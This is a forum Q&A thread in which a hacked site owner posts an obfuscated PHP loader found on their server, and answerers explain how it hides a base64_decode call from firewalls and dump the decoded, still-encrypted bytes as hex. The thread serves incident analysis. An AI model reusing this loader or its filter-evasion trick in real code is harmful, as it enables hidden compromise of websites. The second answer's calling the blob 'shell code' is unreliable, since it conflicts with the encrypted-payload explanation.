# injected code decode

Tags: md5

Recently I saw a domain of mine was hacked and the hacker have injected his code in some encryption format as below.

```
<?php $l___l_='base'.(32*2).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', 'D+I/q0Gc5hiUdrnOss2HvSvTg1sG8Q6rE6jWEaBtDzQFKd1Er6yZI1MBfxpqll488V7Tbm3phDbBFAwG
k5MLq6NbLAXb69v3jtw65S0KD5Nx2R8ROgea8Z0z1b/1amqjjy706S1+QQ2+nJYjdf8QYi0ic4kArurt
yE+zVXve7+PByfRZYTFOL7f+0YwcE/+JilFvFyJjOuid8BGS2mlNGOQfnhKnE5hx6rqcKCtrfk29fJNM
s+r1ppMJoVjBbstGuXjMHXYCPlD90sncCTKs/zartN4bBWXeSWp585mZc+OeYVL5mJcPxJn673e62z+y
rROT7OcGEMyd7LCDyMB41OwG6Q5VDAv0wZNelA+Yz0JiYd4nahYoWC/35syZlXQr136ftUc+8gR9xfQW
gG1d2mOxcozGxZbuM9mB80UyYxmXnRDBocwKeR8uTPTiAEXWocDxXLwuCrfhkLZuAvHG2b857X8uqx68
nS8+XSMFquYb6spb8irA
```

I was wondering if anyone knows how to decode it. I want to see his code. Is there any online site available? Doing some research, some sites shows that it follows following encryption

str_replace --> base64_decode --> md5

Comment: MD5 is not a encryption algorithm, it's hashing. It's not possible to reverse the hashing (but creating a collision is).
And there's no MD5 on the code...

Answer (score 2):

Its a base 64 encoded payload. Web firewalls are familiar with base64 encoded payloads and try to defend against them hence the attacker is using a technique to evade firewalls that search and filter the call to base64_decode.

Eventually the $l___l_ parameter will hold the decoded content

So instead he constructs it as follows:

```
_ $l___l_='base'.(32*2).'_de'.'code' => base64_decode
$l___l_=$l___l_(//content) => base64_decode(content) => decoded content
```

the string replace just deletes the new lines (\n) from the content before decoding

from studying similar looking attack on [this blog](http://wiki.yobi.be/wiki/Forensics_on_Incident_3) it seems that the content you receive after base 64 decoding is an encrypted payload. The password to decrypt the payload is obtained by a POST request to another server.

Comment: yep sure it is what you have explained. Is there any website which will decode it?

Comment: there are many, for example http://www.base64decode.org/

Comment: I edited my reply... have a look at the blog I linked - it looks similar to the payload in your example

Answer (score 1):

MD5 is a hash function, not encryption.  [Base64](http://en.wikipedia.org/wiki/Base64) is an encoding to represent non-printable characters as printable characters.  The quick bit of code he's written simply removes the new lines in the Base64 string you see there, and decodes it to what will probably be his [shell code](http://en.wikipedia.org/wiki/Shellcode).

You can [decode Base64 from this website](http://www.opinionatedgeek.com/dotnet/tools/base64decode/).  The shell code given looks like the following:

```
0f  e2  3f  ab  41  9c  e6  18  94  76  b9  ce  b2  cd  87  bd  
2b  d3  83  5b  06  f1  0e  ab  13  a8  d6  11  a0  6d  0f  34  
05  29  dd  44  af  ac  99  23  53  01  7f  1a  6a  96  5e  3c  
f1  5e  d3  6e  6d  e9  84  36  c1  14  0c  06  93  93  0b  ab  
a3  5b  2c  05  db  eb  db  f7  8e  dc  3a  e5  2d  0a  0f  93  
71  d9  1f  11  3a  07  9a  f1  9d  33  d5  bf  f5  6a  6a  a3  
8f  2e  f4  e9  2d  7e  41  0d  be  9c  96  23  75  ff  10  62  
2d  22  73  89  00  ae  ea  ed  c8  4f  b3  55  7b  de  ef  e3  
c1  c9  f4  59  61  31  4e  2f  b7  fe  d1  8c  1c  13  ff  89  
8a  51  6f  17  22  63  3a  e8  9d  f0  11  92  da  69  4d  18  
e4  1f  9e  12  a7  13  98  71  ea  ba  9c  28  2b  6b  7e  4d  
bd  7c  93  4c  b3  ea  f5  a6  93  09  a1  58  c1  6e  cb  46  
b9  78  cc  1d  76  02  3e  50  fd  d2  c9  dc  09  32  ac  ff  
36  ab  b4  de  1b  05  65  de  49  6a  79  f3  99  99  73  e3  
9e  61  52  f9  98  97  0f  c4  99  fa  ef  77  ba  db  3f  b2  
ad  13  93  ec  e7  06  10  cc  9d  ec  b0  83  c8  c0  78  d4  
ec  06  e9  0e  55  0c  0b  f4  c1  93  5e  94  0f  98  cf  42  
62  61  de  27  6a  16  28  58  2f  f7  e6  cc  99  95  74  2b  
d7  7e  9f  b5  47  3e  f2  04  7d  c5  f4  16  80  6d  5d  da  
63  b1  72  8c  c6  c5  96  ee  33  d9  81  f3  45  32  63  19  
97  9d  10  c1  a1  cc  0a  79  1f  2e  4c  f4  e2  00  45  d6  
a1  c0  f1  5c  bc  2e  0a  b7  e1  90  b6  6e  02  f1  c6  d9  
bf  39  ed  7f  2e  ab  1e  bc  9d  2f  3e  5d  23  05  aa  e6  
1b  ea  ca  5b  f2  2a  c0
```

You could try disassembling the code above using an [Online Disassembler](http://www.onlinedisassembler.com/odaweb/).  Using a single string like below of the shellcode above

```
0f  e2  3f  ab  41  9c  e6  18  94  76  b9  ce  b2  cd  87  bd  2b  d3  83  5b  06  f1  0e  ab  13  a8  d6  11  a0  6d  0f  34  05  29  dd  44  af  ac  99  23  53  01  7f  1a  6a  96  5e  3c  f1  5e  d3  6e  6d  e9  84  36  c1  14  0c  06  93  93  0b  ab  a3  5b  2c  05  db  eb  db  f7  8e  dc  3a  e5  2d  0a  0f  93  71  d9  1f  11  3a  07  9a  f1  9d  33  d5  bf  f5  6a  6a  a3  8f  2e  f4  e9  2d  7e  41  0d  be  9c  96  23  75  ff  10  62  2d  22  73  89  00  ae  ea  ed  c8  4f  b3  55  7b  de  ef  e3  c1  c9  f4  59  61  31  4e  2f  b7  fe  d1  8c  1c  13  ff  89  8a  51  6f  17  22  63  3a  e8  9d  f0  11  92  da  69  4d  18  e4  1f  9e  12  a7  13  98  71  ea  ba  9c  28  2b  6b  7e  4d  bd  7c  93  4c  b3  ea  f5  a6  93  09  a1  58  c1  6e  cb  46  b9  78  cc  1d  76  02  3e  50  fd  d2  c9  dc  09  32  ac  ff  36  ab  b4  de  1b  05  65  de  49  6a  79  f3  99  99  73  e3  9e  61  52  f9  98  97  0f  c4  99  fa  ef  77  ba  db  3f  b2  ad  13  93  ec  e7  06  10  cc  9d  ec  b0  83  c8  c0  78  d4  ec  06  e9  0e  55  0c  0b  f4  c1  93  5e  94  0f  98  cf  42  62  61  de  27  6a  16  28  58  2f  f7  e6  cc  99  95  74  2b  d7  7e  9f  b5  47  3e  f2  04  7d  c5  f4  16  80  6d  5d  da  63  b1  72  8c  c6  c5  96  ee  33  d9  81  f3  45  32  63  19  97  9d  10  c1  a1  cc  0a  79  1f  2e  4c  f4  e2  00  45  d6  a1  c0  f1  5c  bc  2e  0a  b7  e1  90  b6  6e  02  f1  c6  d9  bf  39  ed  7f  2e  ab  1e  bc  9d  2f  3e  5d  23  05  aa  e6  1b  ea  ca  5b  f2  2a  c0
```

Hope this helps!